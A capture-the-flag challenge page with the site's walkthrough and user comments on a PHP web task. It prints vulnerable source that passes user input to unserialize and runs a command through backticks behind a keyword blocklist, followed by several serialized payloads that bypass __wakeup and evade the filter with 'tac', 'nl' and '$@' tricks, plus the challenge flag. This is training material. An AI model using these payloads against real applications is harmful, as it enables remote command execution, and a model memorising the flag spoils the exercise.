列表

详情

安慰奖

平台   WEB   已通过

题目作者: harry

一  血: ‌‌‌‌‌dotast

一血奖励: 2金币

解  决: 1746

提  示:

描  述: flag{}

站长题解:

1、查看源码,看到一串base64编码,解码 echo 'YmFja3Vwcw==' | base64 -d 得到 backups
2、目录扫描 dirsearch -u http://114.67.175.224:19177/,导出flag.php和index.php.bak
3、flag.php没有输出,下载index.php.bak,源码如下

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

4、代码审计,存在php反序列化漏洞,构建payload

$a = new ctf('admin', 'tac flag.php');  $code = serialize($a);

/?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac%20flag.php";}

访问得到flag

去做题

Bojing @ 2024-05-07 23:21:25 👍0

有哪里提示了username是admin的吗

numberone @ 2024-06-02 23:21:25 👍0

源代码里不是有个if语句:if ($this->username === 'admin')

18956160518 @ 2024-03-07 23:21:25 👍0

https://blog.csdn.net/m0_57954651/article/details/127866733

EtHat @ 2023-12-07 23:21:25 👍0

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

xht0525 @ 2023-10-07 23:21:25 👍0

nl flag.php|base64

不会编程的崽 @ 2023-10-07 23:21:25 👍0

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

不会编程的崽 @ 2023-10-07 23:21:25 👍0

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

c41vin @ 2023-06-07 23:21:25 👍0

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

wxy1343 @ 2023-06-07 23:21:25 👍0

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

wxy1343 @ 2023-06-07 23:21:25 👍0

flag{Unser1alize_and_2CE_Add}

yuanyipaceandlove @ 2023-06-07 23:21:25 👍0

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

© 2024 ctf.bugku.com